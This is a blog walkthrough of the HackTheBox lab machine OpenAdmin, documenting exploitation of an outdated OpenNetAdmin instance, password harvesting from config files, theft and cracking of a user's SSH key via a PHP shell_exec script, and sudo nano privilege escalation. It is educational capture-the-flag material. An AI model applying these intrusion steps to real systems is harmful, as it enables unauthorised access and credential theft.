OpenAdmin just retired on HackTheBox. It’s an easy difficulty Linux based box, it need a bit of exploit, lot of recon, pivot and a bit GTFObins to finish, nice combo right? While this box is rated easy I wouldn’t recommend it for beginners since it require a lot a recon, it’s easy to miss important information and can be very frustrating if you are not used to it.
Tl;Dr: To get the user flag you had to exploit a Remote Code Execution exploit on an outdated
opennetadmin instance. You get a shell as
www-data from which you pivot to the
jimmy user after finding his password in a database config file. From
jimmy account you pivot again to
joanna account by extracting her ssh private key using a php script since the Apache web server is configured to run as user
joanna and we have write rights over the
Document Root folder. Finally as
joanna we can get the user flag.
The root flag was a bit less tricky and needed you to execute a shell from inside a privileged
joanna is allowed to run as
root without password.
Alright, let’s get into it!
First thing first, let’s add the box IP to the host file:
[[email protected] ~]$ echo "10.10.10.171 openadmin.htb" >> /etc/hosts
and let’s start!
Let’s start with the classic
nmap scan to see which ports are open on the box:
[[email protected] ~]$ nmap -sV -sT -sC openadmin.htb
We have the “classic”: A web app running on port 80 and the SSH port 22 open.
http://openadmin.htb/ display the Apache2 Ubuntu default page:
Nothing really interesting to see here… Let’s open
gobuster to see if he can find some juicy files and folders:
[[email protected] ~]$ gobuster dir -u "http://openadmin.htb/" -w ~/SecLists/Discovery/Web-Content/big.txt
Three uncommon folder here:
sierraare just static demo website, nothing to do on it.
musiclooks like this:
Oddly enough the
Login button redirect to an admin interface:
First thing that catch the eye is this big yellow message:
You are NOT on the latest release version
Your version = v18.1.1
Latest version = Unable to determine
Please DOWNLOAD the latest version.
We all know what outdated software means right :D
Selecting the “DOWNLOAD” link redirect to the software page which is called….
OpenNetAdmin. At first I though the name of the box would be related to a admin page being open and easily accessible but turn out it was more a reference to the software used.
We have the name of the software and it’s version (which is outdated). Let’s see if some already made exploits are available:
[[email protected] ~]$ searchsploit opennetadmin
Bingo! Remote code execution on the exact version running here. Should be easy right?
[[email protected] ~]$ wget https://www.exploit-db.com/raw/47691 -o opennetadmin-rce.sh
We got a shell as
Let’s start by enumerating users:
www-data[email protected]:/$ ls -lh /home/
Two users, we don’t have enough rights to access neither of their home folder. Let’s continue our enumerations.
One thing that often gives good results on web applications is searching for hard-coded password. A little grep can do that for us:
[email protected]:/$ grep -ri pass .
Here is something interesting! The full config file is the following:
Let’s see if this password can work for either
[[email protected] ~]$ ssh [email protected]
It works with
jimmy! Unfortunately there is no user flags here, but at least we get a stable shell.
Since we got database access I went to check if we could find juicy informations and potential other users password hash in the database:
[email protected]:~$ mysql -u ona_sys -p
Two MD5 hash. Quick Google search shows that
098f6bcd4621d373cade4e832627b4f6 is hash for
21232f297a57a5a743894a0e4a801fc3 is hash for
Too bad no hash for
joanna here. Let’s move on to more recon.
While looking around (still using the awesome
grep) we find some interesting config files mentioning
[email protected]:/etc$ grep -ri "joanna" . 2>/dev/null
sudoers.d one look perfect for a privilege escalation don’t you think ? Let’s keep this in mind for later. The one that really catch my eye is the apache config. Let’s see the full file:
It was the first time I saw about the
AssignUserID configuration. Even if we can easily understand that it’s meant to run the apache process for this virtualhost as
joanna instead of
www-data I searched on the documentation out of curiosity to learn more about this.
This configuration is available through the
AssignUserID: Takes two parameters, uid and gid (or
really, user name and group name; use “#
” if you want to
specify a raw uid); specifies what uid and gid the
vhost will run as (after parsing the request etc., of course).
So, the virtualhost for
/var/www/internal document root runs as
joanna. If we can find a Remote Code Execution command in the PHP code in this folder (by abusing an
eval or uploading web shell for example), then we can run commands as
To be honest, I missed this folder in my previous recons, so let’s see what’s inside now:
[email protected]:/$ ls -l /var/www/
Here is something interesting… The
internal folder is owned by our current
jimmy, meaning we can write anything we want in this folder. I will use use the
shell_exec() php function to try to retrieve
joanna ssh private key.
Here is one way to do it:
Now let’s run it! (Remember apache listen on port
52846 for this virutalhost as we can see in the
internal.conf config file)
[email protected]:/$ curl 127.0.0.1:52846/hg8.php
Note: Don’t forget to remove your php file to not spoil users after you ;)
We can now use
joanna ssh private key to login to her account:
[[email protected] ~]$ ssh -i joanna_id_rsa [email protected]
No luck! Passphrase is needed. From here we have two choices:
Either we go back to our php script and edit it to open a reverse shell instead of grabbing the private key.
We try to brute-force
joannaprivate key passphrase.
I think it would be more interesting to show how to brute-force the hash, if we fail we can still go back to open a simple reserve shell.
I will use
john to bruteforce the ssh key passphrase:
[[email protected] ~]$ ssh2john joanna_id_rsa > id_rsa.hash
Great we got it, and it’s related to ninja again. Let’s grab our flag now:
[[email protected] ~]$ ssh -i joanna_id_rsa [email protected]
The recon phase won’t be needed there since we already got the information we needed while searching around for user flag. As a reminder:
[email protected]:~$ sudo -l
A good habit for fast privilege escalation techniques is to check on GTFOBins.
As a reminder:
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
And of course there is an entry for
Note: ^R means CTRL+R, same for ^X means CTRL+X
Let’s give it a try!
[email protected]:~$ sudo /bin/nano /opt/priv
As always do not hesitate to contact me for any questions or feedbacks :)
See you next time !